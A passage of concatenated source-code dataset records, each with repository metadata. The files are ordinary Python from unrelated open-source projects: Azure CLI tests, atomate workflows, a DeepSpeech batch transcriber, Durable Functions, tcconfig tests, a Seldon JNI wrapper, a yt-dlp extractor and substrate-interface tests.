security_contacts = self.cmd('az security contact list').get_output_in_json()
assert len(security_contacts) >= 0
contact = self.cmd('az security contact show -n default1').get_output_in_json()
assert contact["email"] == "john@contoso.com"
self.cmd('az security contact create -n default1 --email lisa@contoso.com --alert-notifications off --alerts-admins off')
contact = self.cmd('az security contact show -n default1').get_output_in_json()
assert contact["email"] == "lisa@contoso.com"
self.cmd('az security contact delete -n default1')
security_contacts = self.cmd('az security contact list').get_output_in_json()
assert len(security_contacts) == previous_contacts_count
|
959c24d86d0dc57c03e4e25f6da368db16ddb816
|
a133a7c64f6e08def0f936898466990d1fd1b31f
|
/atomate/vasp/workflows/__init__.py
|
d337868373cddc700f8ecc51bce2836803bcf41e
|
[
"LicenseRef-scancode-hdf5",
"LicenseRef-scancode-generic-cla",
"BSD-2-Clause"
] |
permissive
|
hackingmaterials/atomate
|
a6458f9323b8f14d7b4ebb6558fb578d50a3f1ed
|
f4060e55ae3a22289fde9516ff0e8e4ac1d22190
|
refs/heads/main
| 2023-08-07T21:53:24.701157
| 2023-07-25T22:28:06
| 2023-07-25T22:28:06
| 43,023,379
| 217
| 173
|
NOASSERTION
| 2023-08-25T22:09:48
| 2015-09-23T19:53:55
|
Python
|
UTF-8
|
Python
| false
| false
| 508
|
py
|
__init__.py
|
from .presets.core import (
wf_bandstructure,
wf_bandstructure_hse,
wf_bandstructure_no_opt,
wf_bandstructure_plus_boltztrap,
wf_bandstructure_plus_hse,
wf_bulk_modulus,
wf_dielectric_constant,
wf_dielectric_constant_no_opt,
wf_elastic_constant,
wf_elastic_constant_minimal,
wf_gibbs_free_energy,
wf_nmr,
wf_nudged_elastic_band,
wf_piezoelectric_constant,
wf_raman_spectra,
wf_static,
wf_structure_optimization,
wf_thermal_expansion,
)
|
d8303ebae3b21758541b02e57e7a859d98b0ac2c
|
51b8e63958f1dd5be979d4f79d900bee420eefdc
|
/batch_processing/driver.py
|
f227ee5832575b2792431f71b135d21c22eeb974
|
[] |
no_license
|
mozilla/DeepSpeech-examples
|
c46ea4bc4ebd1363a41761b638513647ff5333a5
|
0bfefeb8e4769e3c895b9bc6c5a34cfbdfcbd645
|
refs/heads/r0.9
| 2023-08-25T04:04:19.231750
| 2021-04-06T17:05:04
| 2021-04-06T17:05:04
| 225,900,000
| 763
| 405
| null | 2023-07-25T18:08:01
| 2019-12-04T15:35:37
|
Python
|
UTF-8
|
Python
| false
| false
| 2,073
|
py
|
driver.py
|
import glob
import json
import os
from os.path import expanduser
import click
import delegator
# first loop over the files and convert them to wave.
# record at 16000 Hz in the future or you get this:
# Warning: original sample rate (44100) is different than 16000hz. Resampling might produce erratic speech recognition.
@click.command()
@click.option("--dirname", type=click.Path(exists=True, resolve_path=True))
@click.option("--ext", default=".mp3")
@click.option(
"--model",
default="deepspeech-0.9.3-models.pbmm",
type=click.Path(exists=True, resolve_path=True),
)
@click.option(
"--scorer",
default="deepspeech-0.9.3-models.scorer",
type=click.Path(exists=True, resolve_path=True),
)
# manage my library of podcasts
def main(dirname, ext, model, scorer):
print("main")
model = expanduser(model)
scorer = expanduser(scorer)
pattern = dirname + "/" + "*" + ext
audiorate = "16000"
print(pattern)
for filename in glob.glob(pattern):
print(filename)
wavefile = filename + ".wav"
convert_command = " ".join(
[
"ffmpeg",
"-i",
"'{}'".format(filename),
"-ar",
audiorate,
"'{}'".format(wavefile),
]
)
if not os.path.isfile(wavefile):
print(convert_command)
r = delegator.run(convert_command)
print(r.out)
else:
print("skipping wave conversion that exists")
command = " ".join(
[
"deepspeech",
"--model",
model,
"--scorer",
scorer,
"--audio",
"'{}'".format(wavefile),
# "--extended",
"--json",
]
)
print(command)
r = delegator.run(command)
with open(filename + ".json", "w") as fo:
print(r.out)
fo.write(r.out)
if __name__ == "__main__":
main()
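# Hedged usage sketch (the model filenames are the defaults above; the
# directory is a placeholder):
#
#   python driver.py --dirname ~/podcasts --ext .mp3 \
#       --model deepspeech-0.9.3-models.pbmm \
#       --scorer deepspeech-0.9.3-models.scorer
#
# Each input file is converted to a 16 kHz wave once, transcribed, and the
# JSON transcript is written next to it as <filename>.json.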
|
3fe3c33e8841e6ca26c8546de2b2ba8324923c05
|
dea1c40b5bac7e8dfbcc33e587b15b4487fe25f4
|
/samples/function_chaining/E1_HelloSequence/__init__.py
|
d8945840dcfeabb53a2f35a7916a1127cca104d8
|
[
"MIT"
] |
permissive
|
Azure/azure-functions-durable-python
|
93503441d7ec26c7a54acc0843a88440765def1d
|
5d30ae3b6b1158b021eb848629c1399381d783a8
|
refs/heads/dev
| 2023-08-10T22:22:33.381414
| 2023-08-04T17:41:38
| 2023-08-04T17:41:38
| 167,911,661
| 104
| 54
|
MIT
| 2023-09-07T22:58:23
| 2019-01-28T06:38:12
|
Python
|
UTF-8
|
Python
| false
| false
| 431
|
py
|
__init__.py
|
import azure.functions as func
import azure.durable_functions as df
def orchestrator_function(context: df.DurableOrchestrationContext):
result1 = yield context.call_activity('E1_SayHello', "Tokyo")
result2 = yield context.call_activity('E1_SayHello', "Seattle")
result3 = yield context.call_activity('E1_SayHello', "London")
return [result1, result2, result3]
main = df.Orchestrator.create(orchestrator_function)
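# Hedged companion sketch (not part of this file): the orchestrator above
# chains an activity named 'E1_SayHello'; a minimal implementation would live
# in E1_SayHello/__init__.py, e.g.:
#
#   def main(name: str) -> str:
#       return f"Hello {name}!"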
|
7845bff4b3af13cced84694d11e6b8134ec8e56b
|
86bd1a9b92ffe3edb1982515be7d482584b990ba
|
/test/test_traffic_control.py
|
176a8bc47b4e64be59fd6ccf5f21f441a0440bfa
|
[
"MIT"
] |
permissive
|
thombashi/tcconfig
|
e9202538382d371f34190947cbd3ac0b7332c4db
|
e14f9fbdb235e2d6b2748962735dcf3fa1f356f3
|
refs/heads/master
| 2023-08-19T22:51:56.590952
| 2022-09-26T13:42:13
| 2022-09-26T13:42:13
| 49,825,187
| 753
| 86
|
MIT
| 2021-12-12T03:54:10
| 2016-01-17T16:24:09
|
Python
|
UTF-8
|
Python
| false
| false
| 11,872
|
py
|
test_traffic_control.py
|
"""
.. codeauthor:: Tsuyoshi Hombashi <tsuyoshi.hombashi@gmail.com>
"""
import itertools
import pytest
from allpairspy import AllPairs
from humanreadable import ParameterError
from tcconfig._const import ShapingAlgorithm, Tc, TrafficDirection
from tcconfig._netem_param import (
MAX_CORRUPTION_RATE,
MAX_PACKET_DUPLICATE_RATE,
MAX_PACKET_LOSS_RATE,
MAX_REORDERING_RATE,
MIN_CORRUPTION_RATE,
MIN_PACKET_DUPLICATE_RATE,
MIN_PACKET_LOSS_RATE,
MIN_REORDERING_RATE,
NetemParameter,
)
from tcconfig.traffic_control import TrafficControl
from .common import is_invalid_param
MIN_VALID_PACKET_LOSS = 0.0000000232 # [%]
@pytest.fixture
def device_option(request):
return request.config.getoption("--device")
@pytest.mark.parametrize(
["value"],
[
["".join(opt_list)]
for opt_list in AllPairs(
[
["0.1", "+1.25", "25"],
["kbps", "Kbps", " Kibps", "mbps", "Mbps", " Mibps", "gbps", "Gbps", " Gibps"],
]
)
],
)
def test_TrafficControl_validate_bandwidth_rate_normal(value):
tc_obj = TrafficControl(
"dummy",
netem_param=NetemParameter("dummy", bandwidth_rate=value),
direction=TrafficDirection.OUTGOING,
shaping_algorithm=ShapingAlgorithm.HTB,
)
tc_obj.netem_param.validate_bandwidth_rate()
@pytest.mark.parametrize(
["value", "expected"],
[
["".join(opt_list), ParameterError]
for opt_list in AllPairs([["0.1", "1"], ["", "kb", "KB", "mb", "MB", "gb", "GB"]])
]
+ [["".join(value), ParameterError] for value in ("B", "K", "M", "G")]
+ [["0bps", ParameterError]],
)
def test_TrafficControl_validate_bandwidth_rate_exception_1(value, expected):
with pytest.raises(expected):
tc_obj = TrafficControl(
"dummy",
netem_param=NetemParameter(
"dummy",
bandwidth_rate=value,
latency_time=Tc.ValueRange.LatencyTime.MIN,
latency_distro_time=Tc.ValueRange.LatencyTime.MIN,
),
direction=TrafficDirection.OUTGOING,
shaping_algorithm=ShapingAlgorithm.HTB,
)
tc_obj.netem_param.validate_bandwidth_rate()
@pytest.mark.parametrize(
["value", "expected"],
[
["".join(opt_list), ParameterError]
for opt_list in itertools.product(["-1", "0", "0.0"], ["bps", "Kbps", "MKbps", "GKbps"])
],
)
def test_TrafficControl_validate_bandwidth_rate_exception_2(value, expected):
with pytest.raises(expected):
tc_obj = TrafficControl(
"dummy",
netem_param=NetemParameter(
"dummy",
bandwidth_rate=value,
latency_time=Tc.ValueRange.LatencyTime.MIN,
latency_distro_time=Tc.ValueRange.LatencyTime.MIN,
),
shaping_algorithm=ShapingAlgorithm.HTB,
)
tc_obj.netem_param.validate_bandwidth_rate()
class Test_TrafficControl_validate:
@pytest.mark.parametrize(
[
"rate",
"direction",
"delay",
"delay_distro",
"loss",
"duplicate",
"corrupt",
"src_network",
"exclude_src_network",
"dst_network",
"exclude_dst_network",
"src_port",
"exclude_src_port",
"dst_port",
"exclude_dst_port",
"shaping_algorithm",
],
[
opt_list
for opt_list in AllPairs(
[
[None, "", "100Kbps", "0.5Mbps", "0.1Gbps"], # rate
[TrafficDirection.OUTGOING],
[Tc.ValueRange.LatencyTime.MIN, Tc.ValueRange.LatencyTime.MAX], # delay
[Tc.ValueRange.LatencyTime.MIN, Tc.ValueRange.LatencyTime.MAX], # delay_distro
[
None,
MIN_PACKET_LOSS_RATE,
MIN_VALID_PACKET_LOSS,
MAX_PACKET_LOSS_RATE,
], # loss
[None, MIN_PACKET_DUPLICATE_RATE, MAX_PACKET_DUPLICATE_RATE], # duplicate
[None, MIN_CORRUPTION_RATE, MAX_CORRUPTION_RATE], # corrupt
[None, "192.168.0.1", "192.168.0.0/24"], # src_network
[None, "192.168.0.1", "192.168.0.0/25"], # exclude_src_network
[
None,
"",
"192.168.0.1",
"192.168.0.254",
"192.168.0.1/32",
"192.168.0.0/24",
], # dst_network
[None, "192.168.0.1", "192.168.0.0/25"], # exclude_dst_network
[None, 65535], # src_port
[None, 22], # exclude_src_port
[None, 65535], # dst_port
[None, 22], # exclude_dst_port
[ShapingAlgorithm.HTB, ShapingAlgorithm.TBF], # shaping_algorithm
],
n=3,
)
],
)
def test_normal(
self,
device_option,
rate,
direction,
delay,
delay_distro,
loss,
duplicate,
corrupt,
src_network,
exclude_src_network,
dst_network,
exclude_dst_network,
src_port,
exclude_src_port,
dst_port,
exclude_dst_port,
shaping_algorithm,
):
if device_option is None:
pytest.skip("device option is null")
tc_obj = TrafficControl(
device=device_option,
direction=direction,
netem_param=NetemParameter(
device=device_option,
bandwidth_rate=rate,
latency_time=delay,
latency_distro_time=delay_distro,
packet_loss_rate=loss,
packet_duplicate_rate=duplicate,
corruption_rate=corrupt,
),
src_network=src_network,
exclude_src_network=exclude_src_network,
dst_network=dst_network,
exclude_dst_network=exclude_dst_network,
src_port=src_port,
exclude_src_port=exclude_src_port,
dst_port=dst_port,
exclude_dst_port=exclude_dst_port,
is_enable_iptables=True,
shaping_algorithm=shaping_algorithm,
)
if is_invalid_param(rate, delay, loss, duplicate, corrupt, reordering=None):
with pytest.raises(ParameterError):
tc_obj.validate()
else:
tc_obj.validate()
@pytest.mark.parametrize(
["direction", "delay", "reordering"],
[
opt_list
for opt_list in AllPairs(
[
[TrafficDirection.OUTGOING],
["0.1ms", Tc.ValueRange.LatencyTime.MAX], # delay
[MIN_REORDERING_RATE, MAX_REORDERING_RATE], # reordering
],
n=2,
)
],
)
def test_normal_reordering(self, device_option, direction, delay, reordering):
if device_option is None:
pytest.skip("device option is null")
tc_obj = TrafficControl(
device=device_option,
netem_param=NetemParameter(
device=device_option,
latency_time=delay,
latency_distro_time=Tc.ValueRange.LatencyTime.MIN,
reordering_rate=reordering,
),
direction=direction,
shaping_algorithm=ShapingAlgorithm.HTB,
)
tc_obj.validate()
@pytest.mark.parametrize(
["value", "expected"],
[
[{"latency_time": "-1ms"}, ParameterError],
[{"latency_time": "61min"}, ParameterError],
[{"latency_time": "100ms", "latency_distro_time": "-1ms"}, ParameterError],
[{"latency_time": "100ms", "latency_distro_time": "61min"}, ParameterError],
[{"packet_loss_rate": MIN_PACKET_LOSS_RATE - 0.1}, ParameterError],
[{"packet_loss_rate": MAX_PACKET_LOSS_RATE + 0.1}, ParameterError],
[
{"latency_time": "100ms", "packet_duplicate_rate": MIN_PACKET_DUPLICATE_RATE - 0.1},
ParameterError,
],
[
{"latency_time": "100ms", "packet_duplicate_rate": MAX_PACKET_DUPLICATE_RATE + 0.1},
ParameterError,
],
[{"corruption_rate": MIN_CORRUPTION_RATE - 0.1}, ParameterError],
[{"corruption_rate": MAX_CORRUPTION_RATE + 0.1}, ParameterError],
[{"reordering_rate": MIN_REORDERING_RATE - 0.1}, ParameterError],
[{"reordering_rate": MAX_REORDERING_RATE + 0.1}, ParameterError],
[{Tc.Param.DST_NETWORK: "192.168.0."}, ParameterError],
[{Tc.Param.DST_NETWORK: "192.168.0.256"}, ParameterError],
[{Tc.Param.DST_NETWORK: "192.168.0.0/0"}, ParameterError],
[{Tc.Param.DST_NETWORK: "192.168.0.0/33"}, ParameterError],
[{Tc.Param.DST_NETWORK: "192.168.0.2/24"}, ParameterError],
[{Tc.Param.DST_NETWORK: "192.168.0.0000/24"}, ParameterError],
[{"src_port": -1}, ParameterError],
[{"src_port": 65536}, ParameterError],
[{"dst_port": -1}, ParameterError],
[{"dst_port": 65536}, ParameterError],
],
)
def test_exception(self, device_option, value, expected):
if device_option is None:
pytest.skip("device option is null")
tc_obj = TrafficControl(
device=device_option,
netem_param=NetemParameter(
device=device_option,
bandwidth_rate=value.get("bandwidth_rate"),
latency_time=value.get("latency_time", Tc.ValueRange.LatencyTime.MIN),
latency_distro_time=value.get("latency_distro_time", Tc.ValueRange.LatencyTime.MIN),
packet_loss_rate=value.get("packet_loss_rate"),
packet_duplicate_rate=value.get("packet_duplicate_rate"),
corruption_rate=value.get("corruption_rate"),
),
dst_network=value.get(Tc.Param.DST_NETWORK),
src_port=value.get("src_port"),
dst_port=value.get("dst_port"),
shaping_algorithm=ShapingAlgorithm.HTB,
)
with pytest.raises(expected):
tc_obj.validate()
class Test_TrafficControl_ipv4:
@pytest.mark.parametrize(
["network", "is_ipv6", "expected_ip_ver", "expected_protocol", "expected_protocol_match"],
[
["192.168.0.1", False, 4, "ip", "ip"],
["192.168.0.0/24", False, 4, "ip", "ip"],
["::1", True, 6, "ipv6", "ip6"],
["2001:db00::0/24", True, 6, "ipv6", "ip6"],
],
)
def test_normal(
self,
device_option,
network,
is_ipv6,
expected_ip_ver,
expected_protocol,
expected_protocol_match,
):
if device_option is None:
pytest.skip("device option is null")
tc_obj = TrafficControl(
device=device_option,
netem_param=NetemParameter(
device=device_option,
latency_time=Tc.ValueRange.LatencyTime.MIN,
latency_distro_time=Tc.ValueRange.LatencyTime.MIN,
),
dst_network=network,
is_ipv6=is_ipv6,
shaping_algorithm=ShapingAlgorithm.HTB,
)
assert tc_obj.ip_version == expected_ip_ver
assert tc_obj.protocol == expected_protocol
assert tc_obj.protocol_match == expected_protocol_match
|
5d588d6f3745b566c0f0b92933c99fc2729ea437
|
86393bd0d16c69363aa1afb4c4841fff6314493c
|
/incubating/wrappers/s2i/java-jni/java-jni/JavaJNIServer.py
|
a532b76867858f2e0d016f4682d8b2ab5b1210a5
|
[
"Apache-2.0"
] |
permissive
|
SeldonIO/seldon-core
|
0179fc490c439dbc04f2b8e6157f39291cb11aac
|
6652d080ea10cfca082be7090d12b9e776d96d7a
|
refs/heads/master
| 2023-08-19T08:32:10.714354
| 2023-08-15T12:55:57
| 2023-08-15T12:55:57
| 114,898,943
| 3,947
| 885
|
Apache-2.0
| 2023-09-13T11:29:37
| 2017-12-20T14:51:54
|
HTML
|
UTF-8
|
Python
| false
| false
| 1,656
|
py
|
JavaJNIServer.py
|
import os
import logging
import jpype
from seldon_core.user_model import SeldonComponent
logger = logging.getLogger(__name__)
class JavaJNIServer(SeldonComponent):
def __init__(self):
super().__init__()
self._model = None
def load(self):
"""
We can only have a single JVM per process.
More details can be found here:
https://jpype.readthedocs.io/en/latest/userguide.html#multiprocessing
"""
model_jar_path = os.getenv("JAVA_JAR_PATH")
logger.debug(f"Starting JVM with jar: {model_jar_path}")
# NOTE: convertStrings must be set to True to avoid an explosion of
# interop calls when working with the returned Java strings
jpype.startJVM(classpath=[model_jar_path], convertStrings=True)
model_import_path = os.getenv("JAVA_IMPORT_PATH")
logger.debug(f"Instantiating {model_import_path} object")
java__SeldonComponent = self._import_model(model_import_path)
self._model = java__SeldonComponent()
def _import_model(self, model_import_path: str):
packages = model_import_path.split(".")
if len(packages) < 2:
raise RuntimeError(f"Invalid Java import path: {model_import_path}")
root = packages[0]
current_package = jpype.JPackage(root)
for package in packages[1:]:
current_package = getattr(current_package, package)
return current_package
def predict_rest(self, request: bytes) -> bytes:
logger.debug("Sending request to Java model")
prediction_raw = self._model.predictRawREST(request)
return prediction_raw
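# Hedged usage sketch (env var values and the payload are placeholders):
# load() expects JAVA_JAR_PATH and JAVA_IMPORT_PATH to be set before it is
# called, e.g.:
#
#   os.environ["JAVA_JAR_PATH"] = "/models/model.jar"
#   os.environ["JAVA_IMPORT_PATH"] = "com.example.MyModel"
#   server = JavaJNIServer()
#   server.load()
#   raw = server.predict_rest(b'{"data": {"ndarray": [[1.0]]}}')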
|
8267f7917cd78643469ba5415c1b1a16a15e82ab
|
6c37d1d2437a08e43b13d621d4a8da4da7135b3a
|
/yt_dlp/extractor/ooyala.py
|
65afccdb1c95824c2da74fc1961bc41d805bf0e0
|
[
"Unlicense",
"GPL-2.0-or-later",
"MPL-2.0",
"BSD-3-Clause",
"GPL-3.0-or-later",
"LGPL-2.1-only",
"BSD-2-Clause",
"MIT"
] |
permissive
|
yt-dlp/yt-dlp
|
be040bde10cc40258c879c75ab30215686352824
|
d3d81cc98f554d0adb87d24bfd6fabaaa803944d
|
refs/heads/master
| 2023-09-05T21:15:21.050538
| 2023-09-05T20:35:23
| 2023-09-05T20:35:23
| 307,260,205
| 52,742
| 5,376
|
Unlicense
| 2023-09-14T05:22:08
| 2020-10-26T04:22:55
|
Python
|
UTF-8
|
Python
| false
| false
| 10,067
|
py
|
ooyala.py
|
import base64
import re
from .common import InfoExtractor
from ..compat import (
compat_b64decode,
compat_str,
)
from ..utils import (
determine_ext,
float_or_none,
int_or_none,
smuggle_url,
try_get,
unsmuggle_url,
)
class OoyalaBaseIE(InfoExtractor):
_PLAYER_BASE = 'http://player.ooyala.com/'
_CONTENT_TREE_BASE = _PLAYER_BASE + 'player_api/v1/content_tree/'
_AUTHORIZATION_URL_TEMPLATE = _PLAYER_BASE + 'sas/player_api/v2/authorization/embed_code/%s/%s'
def _extract(self, content_tree_url, video_id, domain=None, supportedformats=None, embed_token=None):
content_tree = self._download_json(content_tree_url, video_id)['content_tree']
metadata = content_tree[list(content_tree)[0]]
embed_code = metadata['embed_code']
pcode = metadata.get('asset_pcode') or embed_code
title = metadata['title']
auth_data = self._download_json(
self._AUTHORIZATION_URL_TEMPLATE % (pcode, embed_code),
video_id, headers=self.geo_verification_headers(), query={
'domain': domain or 'player.ooyala.com',
'supportedFormats': supportedformats or 'mp4,rtmp,m3u8,hds,dash,smooth',
'embedToken': embed_token,
})['authorization_data'][embed_code]
urls = []
formats = []
streams = auth_data.get('streams') or [{
'delivery_type': 'hls',
'url': {
'data': base64.b64encode(('http://player.ooyala.com/hls/player/all/%s.m3u8' % embed_code).encode()).decode(),
}
}]
for stream in streams:
url_data = try_get(stream, lambda x: x['url']['data'], compat_str)
if not url_data:
continue
s_url = compat_b64decode(url_data).decode('utf-8')
if not s_url or s_url in urls:
continue
urls.append(s_url)
ext = determine_ext(s_url, None)
delivery_type = stream.get('delivery_type')
if delivery_type == 'hls' or ext == 'm3u8':
formats.extend(self._extract_m3u8_formats(
re.sub(r'/ip(?:ad|hone)/', '/all/', s_url), embed_code, 'mp4', 'm3u8_native',
m3u8_id='hls', fatal=False))
elif delivery_type == 'hds' or ext == 'f4m':
formats.extend(self._extract_f4m_formats(
s_url + '?hdcore=3.7.0', embed_code, f4m_id='hds', fatal=False))
elif delivery_type == 'dash' or ext == 'mpd':
formats.extend(self._extract_mpd_formats(
s_url, embed_code, mpd_id='dash', fatal=False))
elif delivery_type == 'smooth':
self._extract_ism_formats(
s_url, embed_code, ism_id='mss', fatal=False)
elif ext == 'smil':
formats.extend(self._extract_smil_formats(
s_url, embed_code, fatal=False))
else:
formats.append({
'url': s_url,
'ext': ext or delivery_type,
'vcodec': stream.get('video_codec'),
'format_id': delivery_type,
'width': int_or_none(stream.get('width')),
'height': int_or_none(stream.get('height')),
'abr': int_or_none(stream.get('audio_bitrate')),
'vbr': int_or_none(stream.get('video_bitrate')),
'fps': float_or_none(stream.get('framerate')),
})
if not formats and not auth_data.get('authorized'):
self.raise_no_formats('%s said: %s' % (
self.IE_NAME, auth_data['message']), expected=True)
subtitles = {}
for lang, sub in metadata.get('closed_captions_vtt', {}).get('captions', {}).items():
sub_url = sub.get('url')
if not sub_url:
continue
subtitles[lang] = [{
'url': sub_url,
}]
return {
'id': embed_code,
'title': title,
'description': metadata.get('description'),
'thumbnail': metadata.get('thumbnail_image') or metadata.get('promo_image'),
'duration': float_or_none(metadata.get('duration'), 1000),
'subtitles': subtitles,
'formats': formats,
}
class OoyalaIE(OoyalaBaseIE):
_VALID_URL = r'(?:ooyala:|https?://.+?\.ooyala\.com/.*?(?:embedCode|ec)=)(?P<id>.+?)(&|$)'
_TESTS = [
{
# From http://it.slashdot.org/story/13/04/25/178216/recovering-data-from-broken-hard-drives-and-ssds-video
'url': 'http://player.ooyala.com/player.js?embedCode=pxczE2YjpfHfn1f3M-ykG_AmJRRn0PD8',
'info_dict': {
'id': 'pxczE2YjpfHfn1f3M-ykG_AmJRRn0PD8',
'ext': 'mp4',
'title': 'Explaining Data Recovery from Hard Drives and SSDs',
'description': 'How badly damaged does a drive have to be to defeat Russell and his crew? Apparently, smashed to bits.',
'duration': 853.386,
},
# The video in the original webpage now uses PlayWire
'skip': 'Ooyala said: movie expired',
}, {
# Only available for ipad
'url': 'http://player.ooyala.com/player.js?embedCode=x1b3lqZDq9y_7kMyC2Op5qo-p077tXD0',
'info_dict': {
'id': 'x1b3lqZDq9y_7kMyC2Op5qo-p077tXD0',
'ext': 'mp4',
'title': 'Simulation Overview - Levels of Simulation',
'duration': 194.948,
},
},
{
# Information available only through SAS api
# From http://community.plm.automation.siemens.com/t5/News-NX-Manufacturing/Tool-Path-Divide/ba-p/4187
'url': 'http://player.ooyala.com/player.js?embedCode=FiOG81ZTrvckcchQxmalf4aQj590qTEx',
'md5': 'a84001441b35ea492bc03736e59e7935',
'info_dict': {
'id': 'FiOG81ZTrvckcchQxmalf4aQj590qTEx',
'ext': 'mp4',
'title': 'Divide Tool Path.mp4',
'duration': 204.405,
}
},
{
# empty stream['url']['data']
'url': 'http://player.ooyala.com/player.js?embedCode=w2bnZtYjE6axZ_dw1Cd0hQtXd_ige2Is',
'only_matching': True,
}
]
def _extract_from_webpage(self, url, webpage):
mobj = (re.search(r'player\.ooyala\.com/[^"?]+[?#][^"]*?(?:embedCode|ec)=(?P<ec>[^"&]+)', webpage)
or re.search(r'OO\.Player\.create\([\'"].*?[\'"],\s*[\'"](?P<ec>.{32})[\'"]', webpage)
or re.search(r'OO\.Player\.create\.apply\(\s*OO\.Player\s*,\s*op\(\s*\[\s*[\'"][^\'"]*[\'"]\s*,\s*[\'"](?P<ec>.{32})[\'"]', webpage)
or re.search(r'SBN\.VideoLinkset\.ooyala\([\'"](?P<ec>.{32})[\'"]\)', webpage)
or re.search(r'data-ooyala-video-id\s*=\s*[\'"](?P<ec>.{32})[\'"]', webpage))
if mobj is not None:
embed_token = self._search_regex(
r'embedToken[\'"]?\s*:\s*[\'"]([^\'"]+)',
webpage, 'ooyala embed token', default=None)
yield self._build_url_result(smuggle_url(
mobj.group('ec'), {
'domain': url,
'embed_token': embed_token,
}))
return
# Look for multiple Ooyala embeds on SBN network websites
mobj = re.search(r'SBN\.VideoLinkset\.entryGroup\((\[.*?\])', webpage)
if mobj is not None:
for v in self._parse_json(mobj.group(1), self._generic_id(url), fatal=False) or []:
yield self._build_url_result(smuggle_url(v['provider_video_id'], {'domain': url}))
@staticmethod
def _url_for_embed_code(embed_code):
return 'http://player.ooyala.com/player.js?embedCode=%s' % embed_code
@classmethod
def _build_url_result(cls, embed_code):
return cls.url_result(cls._url_for_embed_code(embed_code),
ie=cls.ie_key())
def _real_extract(self, url):
url, smuggled_data = unsmuggle_url(url, {})
embed_code = self._match_id(url)
domain = smuggled_data.get('domain')
supportedformats = smuggled_data.get('supportedformats')
embed_token = smuggled_data.get('embed_token')
content_tree_url = self._CONTENT_TREE_BASE + 'embed_code/%s/%s' % (embed_code, embed_code)
return self._extract(content_tree_url, embed_code, domain, supportedformats, embed_token)
class OoyalaExternalIE(OoyalaBaseIE):
_VALID_URL = r'''(?x)
(?:
ooyalaexternal:|
https?://.+?\.ooyala\.com/.*?\bexternalId=
)
(?P<partner_id>[^:]+)
:
(?P<id>.+)
(?:
:|
.*?&pcode=
)
(?P<pcode>.+?)
(?:&|$)
'''
_TEST = {
'url': 'https://player.ooyala.com/player.js?externalId=espn:10365079&pcode=1kNG061cgaoolOncv54OAO1ceO-I&adSetCode=91cDU6NuXTGKz3OdjOxFdAgJVtQcKJnI&callback=handleEvents&hasModuleParams=1&height=968&playerBrandingId=7af3bd04449c444c964f347f11873075&targetReplaceId=videoPlayer&width=1656&wmode=opaque&allowScriptAccess=always',
'info_dict': {
'id': 'FkYWtmazr6Ed8xmvILvKLWjd4QvYZpzG',
'ext': 'mp4',
'title': 'dm_140128_30for30Shorts___JudgingJewellv2',
'duration': 1302.0,
},
'params': {
# m3u8 download
'skip_download': True,
},
}
def _real_extract(self, url):
partner_id, video_id, pcode = self._match_valid_url(url).groups()
content_tree_url = self._CONTENT_TREE_BASE + 'external_id/%s/%s:%s' % (pcode, partner_id, video_id)
return self._extract(content_tree_url, video_id)
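# Hedged note (not part of the extractor): _extract_from_webpage() smuggles the
# embedding page's domain and any embedToken into the ooyala: URL it yields;
# OoyalaIE._real_extract() unsmuggles them and forwards both to the
# authorization request built in OoyalaBaseIE._extract().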
|
2e6a7778b2ccb30e66bdb46a711c632f8bfb24bd
|
0d814eb8f2bfef32381834a9fcc8a1e9dbff48d9
|
/test/test_rpc_compatibility.py
|
12138de58a7b7d1e3b78ae07746c3927365795e5
|
[
"Apache-2.0"
] |
permissive
|
polkascan/py-substrate-interface
|
cdc71e44dd9208bce5771cbe1fd9be97bc9e5d18
|
111ff53e23b419cb756146e3d6037a8a6da341eb
|
refs/heads/master
| 2023-08-31T19:27:26.715840
| 2023-08-18T13:42:12
| 2023-08-18T13:42:12
| 180,998,078
| 221
| 109
|
Apache-2.0
| 2023-08-27T16:18:15
| 2019-04-12T11:52:31
|
Python
|
UTF-8
|
Python
| false
| false
| 11,188
|
py
|
test_rpc_compatibility.py
|
# Python Substrate Interface Library
#
# Copyright 2018-2023 Stichting Polkascan (Polkascan Foundation).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import unittest
from unittest.mock import MagicMock
from scalecodec.type_registry import load_type_registry_file
from test import settings
from scalecodec.exceptions import RemainingScaleBytesNotEmptyException
from substrateinterface import SubstrateInterface
from scalecodec.base import ScaleBytes
from scalecodec.types import Vec, GenericAddress
class RPCCompatibilityTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.metadata_fixture_dict = load_type_registry_file(
os.path.join(os.path.dirname(__file__), 'fixtures', 'metadata_hex.json')
)
cls.substrate = SubstrateInterface(url='dummy', ss58_format=42, type_registry_preset='substrate-node-template')
metadata_decoder = cls.substrate.runtime_config.create_scale_object(
'MetadataVersioned', ScaleBytes(cls.metadata_fixture_dict['V14'])
)
metadata_decoder.decode()
cls.substrate.get_block_metadata = MagicMock(return_value=metadata_decoder)
def mocked_query(module, storage_function, block_hash):
if module == 'Session' and storage_function == 'Validators':
if block_hash == '0xec828914eca09331dad704404479e2899a971a9b5948345dc40abca4ac818f93':
vec = Vec()
author = GenericAddress()
author.value = '5GNJqTPyNqANBkUVMN1LPPrxXnFouWXoe2wNSmmEoLctxiZY'
vec.elements = [author]
return vec
raise ValueError(f"Unsupported mocked query {module}.{storage_function} @ {block_hash}")
def mocked_request(method, params, result_handler=None):
if method in ['chain_getBlockHash', 'chain_getHead', 'chain_getFinalisedHead', 'chain_getFinalizedHead']:
return {
"jsonrpc": "2.0",
"result": "0xec828914eca09331dad704404479e2899a971a9b5948345dc40abca4ac818f93",
"id": 1
}
elif method in ['chain_getRuntimeVersion', 'state_getRuntimeVersion']:
return {
"jsonrpc": "2.0",
"result": {"specVersion": 100, "transactionVersion": 1},
"id": 1
}
elif method == 'chain_getHeader':
return {
"jsonrpc": "2.0",
"result": {
"digest": {
"logs": ['0x066175726120afe0021000000000', '0x05617572610101567be3d55b4885ce3ac6a7b46b28adf138299acc3eb5f11ffa15c3ed0551f22b7220ec676ea947cd6c8daa6fcfa351b11e62651e6e06f5dde59bb566d36e6989']
},
"extrinsicsRoot": "0xeaa9cd48b36a88ba7cf934cdbcd8f2afc0843978912452529ace7ef2da09691d",
"number": 3158840,
"parentHash": "0xf33015565b9978d146cdf648c498649b04c323cd35d9f55fad7d8586d4b42ea2",
